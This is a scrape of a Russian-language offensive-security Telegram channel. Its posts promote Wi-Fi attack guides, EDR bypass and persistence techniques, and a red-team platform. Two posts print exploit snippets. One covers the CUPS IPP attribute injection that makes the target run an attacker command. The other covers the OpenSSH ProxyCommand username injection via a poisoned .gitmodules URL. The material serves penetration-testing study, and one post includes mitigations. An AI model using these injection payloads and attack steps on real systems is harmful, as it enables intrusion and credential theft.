AD_POHEQUE
2.16K subscribers
41 photos
7 videos
9 files
77 links
Будь тем, чем другие не были.
https://boosty.to/ghe770mvp
Download Telegram
можно еще и на книжках сэкономить 500 рублей.
2👾8
Ломаем Wi-Fi с клиентами и без, грабим клиентов WPA*-Enterprise на доменные пароли в открытом виде.

Шпаргалка представляет собой чёткую инструкцию по атакам на сети Wi-Fi.

Описаны ключевые команды для мониторинга, перехвата рукопожатий, взлома сетей WPA2-Personal и атак на клиентов WPA2-Enterprise. Для тех, кто хочет освоить базовые навыки пентестера и ломать корпоративные сети покуривая сигаретки около офиса Заказчика или попивать чай в кафе где обычно обедает его персонал.

Предложены методы для атак на клиентов через захват PMKID и рукопожатий, а также более сложные сценарии атак типа Evil Twin и MANA.

Это руководство поможет раздобыть учетные записи, хэши и иногда пароли в открытом виде без привлечения внимания клиентов и получить серьезные аргументы для дальнейших атак на целевые корпоративные сети.

Особое внимание уделено использованию eaphammer для эффективного выполнения атак на WPA2-Enterprise и проведения атак методом социальной инженерии через captive portal.

Да, она старая, но актуальности не потеряла. Часто выручала на проектах.

Спейс инведера жми.
👾
👾21
This media is not supported in your browser
VIEW IN TELEGRAM
🚀 Прикури от root'а: как взломать Linux с помощью зажигалки

Бомбовый материал от David'а Buchanan'а — атака с использованием обычной зажигалки для bit-flip'а в памяти! 📲🔥

Исследователь показал, как с помощью электромагнитных импульсов, создаваемых пьезоэлектрическим воспламенителем зажигали, можно вызвать аппаратные сбои в памяти, получить произвольный доступ к данным и поднять привилегии до root на Linux.

Суть эксплойта:
- Припаиваем антенну к шине DDR3 💻
- Щелкаем зажигалкой 🔥
- Ловим переворот бита 🎯
- Эксплуатируем CPython, создавая примитив для чтения/записи в памяти 📜
- Загружаем shell-код и получаем root 🏴‍☠️

💥 Эта статья замечательная демонстрация того, как изящно можно использовать физические уязвимости для реальных атак.

Полный разбор + код здесь:
[PoC]
[Оригинальная статья]

Берите на вооружение ;)
Спейсинвейдера жми
👾
1👾19
😄Ловите новый гайд по закреплению на IIS-серверах через PSWA (PowerShell Web Access).

Как злоупотребить легитимным функционалом и превратить его в свою точку опоры.
Примеры команд, коротко и по делу.

Подписывайся на @ad_poheque, чтобы быть в курсе актуальных методов взлома! 👾

👾 ЖМИ СПЕЙСИНВЕЙДЕРА 👾
Please open Telegram to view this post
VIEW IN TELEGRAM
👾15
Стоит расширять свои компетенции, хоть я и с большой любовь отношусь к продуктам от Windows и их подходу к безопасной разработке
😄

Не так давно читал на хабре статью о безопасности FreeIPA от Всеволода Саломадина из R-Vision.

https://habr.com/ru/companies/rvision/articles/825086/

Пару часов назад на ютубе опубликовали доклад на эту тему от автора статьи.
https://youtu.be/oLGcuta4R-8

Всем приятного просмотра
🍿

PS:
Базовые концепции также описаны в статье на хактриксе, плюс внизу ссылки на цикл статей от SpecterOps, которые определенно будут интересны специалистам по наступательной безопасности.
https://book.hacktricks.xyz/linux-hardening/freeipa-pentesting

👾ЖМИ СПЕЙСИНВЕЙДЕРА👾
Please open Telegram to view this post
VIEW IN TELEGRAM
👾5
Please open Telegram to view this post
VIEW IN TELEGRAM
👾4
Есть такая конторка под названием Vulnerability Information and Coordination Environment, или просто VINCE. Работают под патронажем американской Cybersecurity & Infrastructure Security Agency, сокращённо киса CISA.

Всё серьёзно: кибербезопасность от самых "безопасных" безопасников. Инфосеки лютые.

Но самое интересное: им можно сдавать баги. А потом удобно усесться, с чашечкой чая, и наблюдать, как нераскрытые отчеты по уязвимостям внезапно оказываются на breachforums. Вот такой вот "координационный" подход.

😂

А теперь про саму уязвимость.

Если вкратце, исследователь обнаружил что у него по 0.0.0.0 вещает UDP порт 631, после того как поставил Ubuntu на свой компьютер.

Немного погулив, он выяснил, что это сервис cups-browsed, который является частью системы CUPS, и он отвечает за обнаружение новых принтеров и их автоматическое добавление в систему. Linux просто добавляет все найденное в сети, прежде чем пользователь сможет это подтвердить или хотя бы получить уведомление. 😱

Выдержка из PoC.

Шаг 1:
Атакующий запускает вредоносный IPP-сервер, а затем отправляет первый UDP-пакет на целевую машину по порту 631:

0 3 http://<IP-АТАКУЮЩЕГО>:<ПОРТ>/printers/whatever

Это заставит целевую машину подключиться обратно к серверу IPP, находящемуся под контролем атакующего, и раскрыть версию ядра и CUPS в заголовке User-Agent.

Шаг 2:
Это заставляет жертву подключиться к IPP-серверу атакующего и запросить его атрибуты. Сервер отвечает списком допустимых атрибутов, включая последний атрибут, используемый для инъекции команд в ОС:

# ... другие допустимые атрибуты ...
(
    SectionEnum.printer,
    b'printer-privacy-policy-uri',
    TagEnum.uri
): [b'https://www.google.com/"\n*FoomaticRIPCommandLine: "' +
    self.command.encode() +
    b'"\n*cupsFilter2 : "application/pdf application/vnd.cups-postscript 0 foomatic-rip'],

Это приведет к:

- Инъекции пользовательских PPD-директив (с двойной кавычкой и новой строкой) в временный PPD-файл. (Баг: строки из атрибутов должны экранироваться)
- Обходу этих проверок. (Баг: пробел, добавленный перед двоеточием, позволяет обойти проверки на основе strncmp)

В результате получим следующий PPD:

...
*cupsSNMPSupplies: False
*cupsLanguages: "en"
*cupsPrivacyURI: "https://www.google.com/"
*FoomaticRIPCommandLine: "echo 1 > /tmp/I_AM_VULNERABLE"
*cupsFilter2 : "application/pdf application/vnd.cups-postscript 0 foomatic-rip"
*cupsSingleFile: True
*cupsFilter2: "application/vnd.cups-pdf application/pdf 0 -"
...

Этот PPD приведет к выполнению команды echo 1 > /tmp/I_AM_VULNERABLE на целевой машине при отправке задания на печать на поддельный принтер.
🫡


👾Подпишись👾
Please open Telegram to view this post
VIEW IN TELEGRAM
👾11
Презентация с которой я выступал на митапе 25.10.25 в Bi.Zone.

Разобрал два эффективных подхода для исполнения кода в обход EDR предложенные Фабианом Мошем и Маркусом Хатчинзом.
Эти парни и их исследования часто выручали меня на реальных проектах, считаю их спонсорами моих компетенций.

Актуальности они не потеряли, пользуйтесь.

👾Подпишись👾
👾10
За этот год я насмотрелся на настоящий цирк в ИБ. Специалисты клепают отчёты ради kpi, пока их инфраструктура гниёт, бюджеты летят на «сертифицированные» СЗИ, которые защищают разве что от здравого смысла. Найм в IT превратился в анекдот: берут кого попало, главное — чтобы покладистый. И девиз у них подходящий:
«Коллеги, у нас много работы, думать некогда — надо работать!».

Как писал Фейербах:
«Высшая степень иллюзорности представляет для них высшую степень святости».


После эфира со Skillbox я написал статью, где разложили всё по фактам. Без прикрас, маркетингового мусора и сказок про волшебные таблетки. Это про то, как построить минимальную, но работающую защиту, а не раздувать бюджеты ради видимости.

Что в статье: 
- Как не закопать деньги в бесполезные подписки. 
- Как собрать инфраструктуру, которая держит удар. 
- Как настроить процессы, которые не развалятся при первом запуске Nmap. 

Если вы хотите разобраться, как на практике выстроить процессы ИБ, при этом не попасть в клуб papersec'ов и прочих "воинов бумажных", — эта статья для вас.
👾

https://skillbox.ru/media/code/kak-postroit-bezopasnuyu-sistemu-dlya-it-proekta-layfhaki-ot-belogo-hakera/
👾23
Этот год был непростым для многих из нас. Для кого-то он стал временем серьёзных испытаний, а для кого-то даже потрясений. Я знаю это по собственному опыту. Но если мы смогли пройти через это, значит, мы справились. Мы выдержали. А это уже немало.

Теперь мы знаем, что способны на большее. Пусть Господь и дальше будет на нашей стороне в новом году. И давайте двигаться вперёд — без иллюзий, с ясным пониманием ситуации и готовностью брать своё.

Стремитесь к свету, оставайтесь на стороне справедливости и помните: сила в правде.
Берегите себя и своих близких.

С Новым годом!
👾
👾10
С праздником, ребят!
👾16
ВИДЕОПОСТ

В 2019 году был на PHDays и слушал в зале (кхм, в коридоре московского Defcon'а) доклад Дениса Макрушина про атаки на OpenEMR — тогда (и сейчас) был актуальным вектором атак на медицинские организации.

Помню, как тогда загорелся подходом Red Team, начал копать глубже, а спустя 6 лет можно посмотреть на то, как мы с Денисом и Евгением обсуждаем актуальные темы использования искусственного интеллекта в кибербезопасности.

Рассказал, какие преференции даёт атакующим применение искусственного интеллекта, насколько широкие возможности это открывает для профессионалов в сфере информационной безопасности и как это может помочь защитникам.

Наша беседа рассчитана на широкую аудиторию, так что не робейте — рассылайте ссылку сёстрам, дочерям, матерям.

CLICK2WIN

👾
👾15
Мир меняется — и мы тоже.
Раньше здесь были гайды и пентестерский бэклог. Сегодня я хочу показать, куда это всё привело.

◾️ Я больше полугода работаю над проектом Ледокол OS — Инфраструктурной платформой для Red Team и наступательных киберопераций.
◾️ Это уже не утилита, а сложный продукт, над которым вместе со мной работают мои коллеги.
◾️ Подробности и первые обзоры мы начинаем публиковать на странице проекта:

https://ledokol.privesc.ru/

Сегодня первый анонс.
В понедельник выйдет полноценный технологический обзор.
👾25
Forwarded from Ледокол ОС (Ledokol Team)
Коллеги, в блоге вышел новый материал — «Ledokol: интерфейс пользователя».

Ледокол дает вам волю управлять наступательными операциями в режиме реального времени. Теперь для атакующего процесс анализа защищённости превращается в увлекательное занятие с механикой RTS-стратегии: метрики понятны, плейбуки исполняются мгновенно, даже сложные задачи решаются через LLM-ассистента Мишка-GPT.

«Ледокол» убирает хаос и даёт единый центр управления. Всё под вашим контролем. Всё внутри изолированного контура. Все победы — ваши.

🤙🏻 Остаёмся на связи.

👉🏻 Читать статью.
👾9
🎙 В среду иду на подкаст — свободный разговор о том, что происходит в современной разработке: от вайб-кодинга и AI-агентов до инфраструктуры.

Поговорим о том, где разработчики чаще всего спотыкаются об безопасность и почему даже хорошие практики нередко превращаются в иллюзию контроля.

Если вы сами варитесь в этой среде — напишите, какие темы стоит поднять, что донести коллегам и какие боли подсветить.

💬 Идеи можно оставить через форму связи с каналом — включим самые острые в выпуск.

👾
👾5
Про MCP-оснастки и почему я «за»

Недавно опубликовали
https://github.com/IBM/mcp-context-forge

Здорово, что такие решения наконец выходят в открытый доступ. В ИБ до сих пор недооценивают, что MCP-шлюз/оснастка между инструментами и LLM даёт реальный прирост продуктивности.

Коротко — в чём суть: LLM не управляет временем и не «ждёт». Даже если ассистент запустил условный nmap на нужную подсеть, ему нужно дождаться результатов, а не фантазировать по логам старта. Значит нам необходимо:

Централизованный учёт задач (реестр job’ов, статусы, корреляционные ID).

Событийная модель: инструмент сам пушит DONE/FAILED/PROGRESS, а не LLM опрашивает каждые N секунд.

Надёжное состояние: ретраи, промежуточные результаты, очередь/кэш. ETA — лишь ориентир; сканы и брут могут тянуться.

Как это склеивается с RAG:
после завершения задачи MCP-шлюз триггерит пайплайн — подтянуть артефакты, распарсить, обогатить контекст (RAG), и вернуть LLM уже готовые факты для следующего шага (например, от nmap → в httpx/nuclei → в отчёт/джиру).

Итог: MCP = дисциплина исполнения. Он превращает «попросил LLM — и забыл» в детерминированный, наблюдаемый процесс: кто запустил, что исполняется, когда завершилось, куда отгружены результаты и какой следующий инструмент их берёт.

🔫🤖🔫

👾
Please open Telegram to view this post
VIEW IN TELEGRAM
👾8
Forwarded from Ледокол ОС (Ledokol Team)
⚡️F5 — IT-гигант со шпионами внутри производственной среды

15 октября F5 признала: APT-группа аффилированная с иностранной разведкой держала полный доступ к их среде разработки. Присутствие было скрытое, не отличалось от легитимной авторизованной деятельности.  Изъяты исходники BIG-IP, черновики будущих патчей, описания ещё нераскрытых уязвимостей. Всё это — без единого алерта.

Компания уверяет, что всё под контролем, уровень защищённости высокий.
Верим.

Но вывод напрашивается сам — если в твоей лаборатории был противник, он оставил не только закладки в инфраструктуре. Самое ценное для них это понимание: как вы думаете, на основе чего принимаете решения, куда смотрите и куда не смотрите вовсе. Самое критичное, что эти парни уже у многих клиентов F5, сам вендор просто точка входа.

Смысл не в майнере и не в шифровании вашей инфраструктуры выкупа ради. Они торгуют данными, которые портят погоду владельцам бизнеса и дают аргументы для того что бы предприятие было дискредитировано, его клиенты скомпрометированы. Они создают свои kill chain из ваших разработчиков, подрядчиков, интеграторов — и продают спецслужбам чувствительную информацию. У них всегда имеется козырь и возможность устроить диверсию любого масштаба. Сегодня они «тестят гипотезы», завтра — крутят уязвимость средней критичности до уровня административного доступа в инфраструктуру.

Времена изменились, вас обогнали.

Сканеры, отчёты, SOC-алерты — это необходимо, но недостаточно. Он убирает боль, но не лечит.

Когда котлы встанут, не поможет ни CrowdStrike, ни Mandiant, ни отечественные СЗИ. Предотвратить такое способна только глубокая эмуляция угроз, моделирование каждого реального сценария — даже того, который «в теории невозможен».

Для этого и существует Ледокол ОС.
Суверенная среда, где Red и Blue не играют в догонялки, а работают в связке: атакующие симулируют противника, защитники видят, где он.


В ближайшие дни мы разберём кейс F5 детально — покажем, как их история меняет подход к обороне.
и главное — как “Ледокол” убирает слепые зоны, где даже CrowdStrike не видит.

Мы в сети.

Остаёмся на связи.
👾9
CVE-2025-61984: ProxyCommand → newline → rce на клиенте

Openssh до 10.1 пропускает управляющие символы в username, которые через %r летят в ProxyCommand. В bash можно сломать строку exec триггером $[+], шелл падает на ошибке и исполняет следующую строку, которую контролирует атакующий.

В атакуемом репо в .gitmodules у сабмодуля делаем url с «отравленным» username:
$[+] source poc.sh @foo.example.com:repo 

у цели в ~/.ssh/config есть матч с
ProxyCommand ... %r@%h:%p.

git clone --recursive … → на уязвимой машине bash ругается на $[+] и выполняет source poc.sh.

Что уязвимо:
— bash: ошибка на строке → выполняет следующую;
— fish: аналогично;
— csh/tcsh: «illegal variable name» → дальше исполняет;
— zsh: по умолчанию fatal error — уязвимости нет.

Интересный вектор через ssh:// url. часть url-схем на десктопе пропускают перевод строки в username; браузеры часто скрывают username в адресной строке — удобная маскировка для социальной инженерии. Не везде включено по умолчанию, но проверять стоит.

В реальности хороший способ внедриться в цепь поставок и развить атаку дальше.

— ваш сабмодуль в «безобидном» репо → dev/CI с --recursive и конфигом c %r в ProxyCommand;
— авто-генерация конфигов (например, tsh config у teleport исторически клал %r@%h:%p). тут совмещается supply-chain + ssh-прокси.

Минимальная защита.
— обновиться до openssh ≥ 10.1 (запрет control-символов, плюс жёстче к ssh://).
— в ProxyCommand кавычить одинарными (двойные не помогут)
%r → '%r'@%h:%p


Разбор и PoC

👾
👾4